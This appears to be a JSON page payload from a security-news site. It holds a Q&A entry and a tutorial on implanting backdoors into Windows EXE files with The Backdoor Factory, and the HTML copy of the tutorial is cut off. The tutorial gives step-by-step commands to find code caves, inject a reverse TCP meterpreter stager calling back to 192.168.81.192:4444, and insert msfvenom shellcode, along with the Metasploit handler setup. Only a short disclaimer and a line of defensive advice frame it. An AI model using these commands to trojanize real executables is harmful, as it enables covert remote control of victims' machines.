[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fFv91ttEzWUTcU6KbB3rcZ5J3CANjSQs5FeI6F7I7ipk":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":51,"createdAt":51,"_status":50},377,"What are code caves and why are they important for backdooring EXE files with BDF?","Code caves are unused byte regions within PE file sections (like .data or .rdata) that can be overwritten with shellcode without affecting the original program. The Backdoor Factory scans for these caves to store payloads, avoiding file size increases. However, if the cave is in a non-executable section, BDF must modify section permissions to add execute rights, as detailed in the [original article](\u002Fnews\u002Fimplanting-backdoors-into-exe-files-using-bdf).","\u003Cp>Code caves are unused byte regions within PE file sections (like .data or .rdata) that can be overwritten with shellcode without affecting the original program. The Backdoor Factory scans for these caves to store payloads, avoiding file size increases. However, if the cave is in a non-executable section, BDF must modify section permissions to add execute rights, as detailed in the [original article](\u002Fnews\u002Fimplanting-backdoors-into-exe-files-using-bdf).\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fimplanting-backdoors-into-exe-files-using-bdf\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","what-are-code-caves-and-why-are-they-important-for-backdooring-exe-files-with-bd-1777483703035","code caves, PE sections, shellcode, Backdoor Factory, RWE permissions",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":47,"updatedAt":48,"createdAt":49,"_status":50},95,"Implanting backdoors into EXE files using BDF","implanting-backdoors-into-exe-files-using-bdf","Learn how to implant backdoors into EXE files using The Backdoor Factory. Explore principles, code caves, payload injection, and practical testing for ethical hacking.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>The Backdoor Factory can be used to implant backdoors into executable files, modify program execution flow, and execute added payloads.\u003C\u002Fp>\u003Cp>This article will introduce the principles of implanting backdoors into EXE files, test the methods of The Backdoor Factory for backdoor implantation, analyze the details, and summarize the approach.\u003C\u002Fp>\u003Cp>The Backdoor Factory download address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fsecretsquirrel\u002Fthe-backdoor-factory\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>Principles of EXE file backdoor implantation\u003C\u002Fli>\u003Cli>Practical testing of The Backdoor Factory\u003C\u002Fli>\u003Cli>Analysis of The Backdoor Factory functionality\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Basic Knowledge\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>\u003Cstrong>PE File Format:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>References:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fen.wikibooks.org\u002Fwiki\u002FX86_Disassembly\u002FWindows_Executable_Files\u003C\u002Fp>\u003Cp>\u003Cstrong>Code Caves:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>References:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.codeproject.com\u002FArticles\u002F20240\u002FThe-Beginners-Guide-to-Codecaves\u003C\u002Fp>\u003Cp>\u003Cstrong>Intuitive Understanding of Code Caves:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Generate an exe file using vc6.0 and examine the available Code Caves in the file\u003C\u002Fp>\u003Cp>C code:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>#include \"stdafx.h\"\u003Cbr>#include \u003Cwindows.h>\u003Cbr>#include \u003Cstdio.h>\u003Cbr>\u003Cbr>int array[200]={1,2,3,4,5,6,7,8,9};\u003Cbr>char array2[200]=\"123456789ABCDEF\";\u003Cbr>\u003Cbr>int main(int argc, char* argv[])\u003Cbr>{\u003Cbr>\tprintf(\"hello world\");\t\u003Cbr>\treturn 0;\u003Cbr>}\u003C\u002Fstdio.h>\u003C\u002Fwindows.h>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Open the file generated by Release compilation using Immunity Debugger\u003C\u002Fp>\u003Cp>View-Memory (shortcut Alt+M)\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017415890_0_a074bf8e65.jpeg\">\u003C\u002Fp>\u003Cp>hello.exe contains four sections, namely PE header, .text, .rdata, and .data\u003C\u002Fp>\u003Cp>View the .data section of hello.exe\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017461665_1_5579f0a51a.jpeg\">\u003C\u002Fp>\u003Cp>Large sections of 0x00 data are found, which can be replaced with payload\u003C\u002Fp>\u003Ch2>0x03 Principle of File Backdoor Implantation\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>Implantation Principle\u003C\u002Fh3>\u003Cp>Modify the program's execution flow to jump to Code Caves, execute the payload, and then return to the normal program flow\u003C\u002Fp>\u003Cp>Note that by default, only the .text section of a program has execution permissions. If the payload is added to other sections (such as .data or .rdata), execution permissions must be granted to that section\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>In practice, multiple Code Caves can be jumped to piece together the execution of the payload\u003C\u002Fp>\u003Ch3>Exploitation Approach\u003C\u002Fh3>\u003Ch4>1. Add a new section with read, write, and execute (RWE) permissions\u003C\u002Fh4>\u003Cp>Tools such as LordPE can be used\u003C\u002Fp>\u003Cp>Manual addition reference:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.exploit-db.com\u002Fdocs\u002F42061.pdf\u003C\u002Fp>\u003Cp>\u003Cstrong>Advantages:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Simple and straightforward, no need to consider the size of file Code Caves\u003C\u002Fp>\u003Cp>\u003Cstrong>Disadvantages:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Increases file size\u003C\u002Fp>\u003Ch4>2. Use Code Caves\u003C\u002Fh4>\u003Cp>Search existing sections to find available Code Caves; for non-executable sections, executable permissions must also be added.\u003C\u002Fp>\u003Cp>\u003Cstrong>Advantages:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Does not change file size.\u003C\u002Fp>\u003Cp>\u003Cstrong>Disadvantages:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Need to consider whether the size of the Code Caves meets the payload length.\u003C\u002Fp>\u003Ch2>0x04 Practical Testing: The Backdoor Factory\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Kali 2.0 comes with The Backdoor Factory by default, located at usr\u002Fshare\u002Fbackdoor-factory.\u003C\u002Fp>\u003Cp>The test system is selected as Kali 2.0.\u003C\u002Fp>\u003Cp>For ease of testing, the test exe code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>#include \u003Cwindows.h>\u003Cbr>#include \u003Cstdio.h>\u003Cbr>\u003Cbr>int array[200]={1,2,3,4,5,6,7,8,9};\u003Cbr>char array2[200]=\"123456789ABCDEF\";\u003Cbr>\u003Cbr>int main(int argc, char* argv[])\u003Cbr>{\u003Cbr>\tprintf(\"hello world\\n\");\t\u003Cbr>\tsystem(\"PAUSE\"); \u003Cbr>\treturn 0;\u003Cbr>}\u003C\u002Fstdio.h>\u003C\u002Fwindows.h>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The program outputs hello world and then pauses\u003C\u002Fp>\u003Cp>The following introduces common functions in The Backdoor Factory\u003C\u002Fp>\u003Ch3>1. Check if the file is compatible with The Backdoor Factory\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fbackdoor.py -f test.exe -S\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Output as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>[*] Checking if binary is supported\u003Cbr>[*] Gathering file info\u003Cbr>[*] Reading win32 entry instructions\u003Cbr>test.exe is supported.\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. Get available payloads for this file\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fbackdoor.py -f test.exe -s show\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The output is as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017478077_2_1b3d54bbf8.jpeg\">\u003C\u002Fp>\u003Cp>Available payloads are as follows:\u003C\u002Fp>\u003Cul>\u003Cli>cave_miner_inline\u003C\u002Fli>\u003Cli>iat_reverse_tcp_inline\u003C\u002Fli>\u003Cli>iat_reverse_tcp_inline_threaded\u003C\u002Fli>\u003Cli>iat_reverse_tcp_stager_threaded\u003C\u002Fli>\u003Cli>iat_user_supplied_shellcode_threaded\u003C\u002Fli>\u003Cli>meterpreter_reverse_https_threaded\u003C\u002Fli>\u003Cli>reverse_shell_tcp_inline\u003C\u002Fli>\u003Cli>reverse_tcp_stager_threaded\u003C\u002Fli>\u003Cli>user_supplied_shellcode_threaded\u003C\u002Fli>\u003C\u002Ful>\u003Cp>\u003Cstrong>Name resolution:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>\u003Cstrong>cave_miner_inline:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>As a payload template with a length of 135, it only implements control flow jumps and performs no other operations, serving as a template for custom shellcode development.\u003C\u002Fp>\u003Cp>The disassembled payload format is shown in the figure below.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017487710_3_d721473ed4.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>reverse_shell_tcp_inline:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Corresponding meterpreter server:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>use exploit\u002Fmulti\u002Fhandler\u003Cbr>set payload windows\u002Fmeterpreter\u002Freverse_tcp\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>meterpreter_reverse_https_threaded:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Corresponding meterpreter server:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>use exploit\u002Fmulti\u002Fhandler\u003Cbr>set payload windows\u002Fmeterpreter\u002Freverse_https\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>iat in iat_reverse_tcp_inline:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>iat stands for Import Address Table. If the PE file's IAT does not include the APIs LoadLibraryA and GetProcAddress, directly executing the payload reverse_shell_tcp_inline will fail. iat_reverse_tcp_inline adds functionality to repair the IAT to avoid execution failure.\u003C\u002Fp>\u003Cp>\u003Cstrong>user_supplied_shellcode_threaded:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Custom payload, which can be generated via msf.\u003C\u002Fp>\u003Ch3>3. Search for available Code Caves in the file\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fbackdoor.py -f test.exe -c\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>If the payload length is 703, the Code Caves must satisfy a length greater than 703. Parameters are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fbackdoor.py -f test.exe -c -l 703\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Output as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017497493_4_9b62c67208.jpeg\">\u003C\u002Fp>\u003Cp>Found three exploitable locations in total:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>No section\u003Cbr>-&gt;Begin Cave 0x240\u003Cbr>-&gt;End of Cave 0x1000\u003Cbr>Size of Cave (int) 3520\u003Cbr>**************************************************\u003Cbr>No section\u003Cbr>-&gt;Begin Cave 0x693a\u003Cbr>-&gt;End of Cave 0x700c\u003Cbr>Size of Cave (int) 1746\u003Cbr>**************************************************\u003Cbr>We have a winner: .data\u003Cbr>-&gt;Begin Cave 0x7051\u003Cbr>-&gt;End of Cave 0x7350\u003Cbr>Size of Cave (int) 767\u003Cbr>SizeOfRawData 0x1000\u003Cbr>PointerToRawData 0x7000\u003Cbr>End of Raw Data: 0x8000\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The output address is a Relative Virtual Address (RVA), which is the offset address relative to the file header (base address Image Base)\u003C\u002Fp>\u003Cp>The actual address in memory (Virtual Address) = Image Base + RVA\u003C\u002Fp>\u003Cp>ImageBase = 0x00400000\u003C\u002Fp>\u003Cp>Use Immunity Debugger to view the memory structure for verification\u003C\u002Fp>\u003Cp>Memory structure as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017505897_5_cb528d3f77.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>(1)\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>No section\u003C\u002Fp>\u003Cp>-&gt;Begin Cave 0x240\u003C\u002Fp>\u003Cp>-&gt;End of Cave 0x1000\u003C\u002Fp>\u003Cp>Size of Cave (int) 3520\u003C\u002Fp>\u003Cp>Actual memory address is 0x00400240-0x00401000, located in the PE header, default permission is R\u003C\u002Fp>\u003Cp>View memory address data as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017511367_6_a5650cbb10.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>(2)\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>No section\u003C\u002Fp>\u003Cp>-&gt;Begin Cave 0x693a\u003C\u002Fp>\u003Cp>-&gt;End of Cave 0x700c\u003C\u002Fp>\u003Cp>Size of Cave (int) 1746\u003C\u002Fp>\u003Cp>Actual memory address is 0x0040693a-0x0040700c, located in the .rdata section, default permission is R\u003C\u002Fp>\u003Cp>View memory address data as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017516858_7_afee61644d.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>(3)\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>We have a winner: .data\u003C\u002Fp>\u003Cp>-&gt;Begin Cave 0x7051\u003C\u002Fp>\u003Cp>-&gt;End of Cave 0x7350\u003C\u002Fp>\u003Cp>Size of Cave (int) 767\u003C\u002Fp>\u003Cp>Actual memory address is 0x00407051-0x00407350, located in the .data section with default RW permissions\u003C\u002Fp>\u003Cp>View memory address data as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017521356_8_7157a1aa5d.jpeg\">\u003C\u002Fp>\u003Cp>It can be seen that the Code Caves found through The Backdoor Factory all meet the requirements\u003C\u002Fp>\u003Ch3>4. Add payload\u003C\u002Fh3>\u003Cp>Here, reverse_tcp_stager_threaded is selected for testing, with a payload length of 703\u003C\u002Fp>\u003Cp>Server:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>use exploit\u002Fmulti\u002Fhandler\u003Cbr>set payload windows\u002Fmeterpreter\u002Freverse_tcp\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(1) Add a new section to save the payload\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fbackdoor.py -f test.exe -H 192.168.81.192 -P 4444 -s reverse_tcp_stager_threaded -a -o test1.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The new section is named .sdata with RWE permissions\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017524645_9_9ef2f8743b.jpeg\">\u003C\u002Fp>\u003Cp>If specifying the new section name as aaa, the parameters are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fbackdoor.py -f test.exe -H 192.168.81.192 -P 4444 -s reverse_tcp_stager_threaded -a -n aaa -o test1.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(2) Save the payload into the .data section\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fbackdoor.py -f test.exe -H 192.168.81.192 -P 4444 -s reverse_tcp_stager_threaded -o test2.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Select the .data section as prompted\u003C\u002Fp>\u003Cp>Change the .data section permissions to RWE, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017526812_10_c6ff04d607.jpeg\">\u003C\u002Fp>\u003Cp>Add jump code JMP TEST2.00407055 at the program entry point, where 0x00407055 stores the added payload\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017528213_11_46aa0eab2d.jpeg\">\u003C\u002Fp>\u003Ch4>(3) Save payload to other segments\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fbackdoor.py -f test.exe -H 192.168.81.192 -P 4444 -s reverse_tcp_stager_threaded -o test3.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Select the PE header as prompted, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017530136_12_f89f65a0d1.jpeg\">\u003C\u002Fp>\u003Cp>Execution will report an error and needs to be fixed\u003C\u002Fp>\u003Cp>Use the tool nasm_shell to convert assembly code into hexadecimal data\u003C\u002Fp>\u003Cp>Kali2.0 integrates nasm_shell by default\u003C\u002Fp>\u003Cp>Tool usage is shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017531304_13_1444d8a8ba.jpeg\">\u003C\u002Fp>\u003Ch4>(4) Custom payload\u003C\u002Fh4>\u003Cp>Generate payload:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>msfvenom -p windows\u002Fmessagebox -f raw &gt;msg.bin\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Add payload:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fbackdoor.py -f test.exe -s user_supplied_shellcode_threaded -U msg.bin -o test4.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Testing as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017532156_14_834d64cab9.jpeg\">\u003C\u002Fp>\u003Ch2>0x05 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces the method of implanting backdoors into EXE files using The Backdoor Factory, leveraging Code Caves to avoid altering the original file size.\u003C\u002Fp>\u003Cp>Of course, this exploitation method has already been detected by antivirus software. The content presented here is for technical research purposes only.\u003C\u002Fp>\u003Cp>From a defensive perspective, extra caution is required when downloading files: only download programs from trusted sources and verify file hashes.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>The Backdoor Factory can be used to implant backdoors into executable files, modify program execution flow, and execute added payloads.\u003C\u002Fp>\u003Cp>This article will introduce the principles of implanting backdoors into EXE files, test the methods of The Backdoor Factory for backdoor implantation, analyze the details, and summarize the approach.\u003C\u002Fp>\u003Cp>The Backdoor Factory download address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fsecretsquirrel\u002Fthe-backdoor-factory\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>Principles of EXE file backdoor implantation\u003C\u002Fli>\u003Cli>Practical testing of The Backdoor Factory\u003C\u002Fli>\u003Cli>Analysis of The Backdoor Factory functionality\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Basic Knowledge\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>\u003Cstrong>PE File Format:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>References:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fen.wikibooks.org\u002Fwiki\u002FX86_Disassembly\u002FWindows_Executable_Files\u003C\u002Fp>\u003Cp>\u003Cstrong>Code Caves:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>References:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.codeproject.com\u002FArticles\u002F20240\u002FThe-Beginners-Guide-to-Codecaves\u003C\u002Fp>\u003Cp>\u003Cstrong>Intuitive Understanding of Code Caves:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Generate an exe file using vc6.0 and examine the available Code Caves in the file\u003C\u002Fp>\u003Cp>C code:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>#include \"stdafx.h\"\u003Cbr>#include \u003Cwindows.h>\u003Cbr>#include \u003Cstdio.h>\u003Cbr>\u003Cbr>int array[200]={1,2,3,4,5,6,7,8,9};\u003Cbr>char array2[200]=\"123456789ABCDEF\";\u003Cbr>\u003Cbr>int main(int argc, char* argv[])\u003Cbr>{\u003Cbr>\tprintf(\"hello world\");\t\u003Cbr>\treturn 0;\u003Cbr>}\u003C\u002Fstdio.h>\u003C\u002Fwindows.h>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Open the file generated by Release compilation using Immunity Debugger\u003C\u002Fp>\u003Cp>View-Memory (shortcut Alt+M)\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017415890_0_a074bf8e65-1.jpeg\">\u003C\u002Fp>\u003Cp>hello.exe contains four sections, namely PE header, .text, .rdata, and .data\u003C\u002Fp>\u003Cp>View the .data section of hello.exe\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017461665_1_5579f0a51a-1.jpeg\">\u003C\u002Fp>\u003Cp>Large sections of 0x00 data are found, which can be replaced with payload\u003C\u002Fp>\u003Ch2>0x03 Principle of File Backdoor Implantation\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>Implantation Principle\u003C\u002Fh3>\u003Cp>Modify the program's execution flow to jump to Code Caves, execute the payload, and then return to the normal program flow\u003C\u002Fp>\u003Cp>Note that by default, only the .text section of a program has execution permissions. If the payload is added to other sections (such as .data or .rdata), execution permissions must be granted to that section\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>In practice, multiple Code Caves can be jumped to piece together the execution of the payload\u003C\u002Fp>\u003Ch3>Exploitation Approach\u003C\u002Fh3>\u003Ch4>1. Add a new section with read, write, and execute (RWE) permissions\u003C\u002Fh4>\u003Cp>Tools such as LordPE can be used\u003C\u002Fp>\u003Cp>Manual addition reference:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.exploit-db.com\u002Fdocs\u002F42061.pdf\u003C\u002Fp>\u003Cp>\u003Cstrong>Advantages:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Simple and straightforward, no need to consider the size of file Code Caves\u003C\u002Fp>\u003Cp>\u003Cstrong>Disadvantages:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Increases file size\u003C\u002Fp>\u003Ch4>2. Use Code Caves\u003C\u002Fh4>\u003Cp>Search existing sections to find available Code Caves; for non-executable sections, executable permissions must also be added.\u003C\u002Fp>\u003Cp>\u003Cstrong>Advantages:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Does not change file size.\u003C\u002Fp>\u003Cp>\u003Cstrong>Disadvantages:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Need to consider whether the size of the Code Caves meets the payload length.\u003C\u002Fp>\u003Ch2>0x04 Practical Testing: The Backdoor Factory\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Kali 2.0 comes with The Backdoor Factory by default, located at usr\u002Fshare\u002Fbackdoor-factory.\u003C\u002Fp>\u003Cp>The test system is selected as Kali 2.0.\u003C\u002Fp>\u003Cp>For ease of testing, the test exe code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>#include \u003Cwindows.h>\u003Cbr>#include \u003Cstdio.h>\u003Cbr>\u003Cbr>int array[200]={1,2,3,4,5,6,7,8,9};\u003Cbr>char array2[200]=\"123456789ABCDEF\";\u003Cbr>\u003Cbr>int main(int argc, char* argv[])\u003Cbr>{\u003Cbr>\tprintf(\"hello world\\n\");\t\u003Cbr>\tsystem(\"PAUSE\"); \u003Cbr>\treturn 0;\u003Cbr>}\u003C\u002Fstdio.h>\u003C\u002Fwindows.h>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The program outputs hello world and then pauses\u003C\u002Fp>\u003Cp>The following introduces common functions in The Backdoor Factory\u003C\u002Fp>\u003Ch3>1. Check if the file is compatible with The Backdoor Factory\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fbackdoor.py -f test.exe -S\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Output as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>[*] Checking if binary is supported\u003Cbr>[*] Gathering file info\u003Cbr>[*] Reading win32 entry instructions\u003Cbr>test.exe is supported.\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. Get available payloads for this file\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fbackdoor.py -f test.exe -s show\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The output is as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017478077_2_1b3d54bbf8-1.jpeg\">\u003C\u002Fp>\u003Cp>Available payloads are as 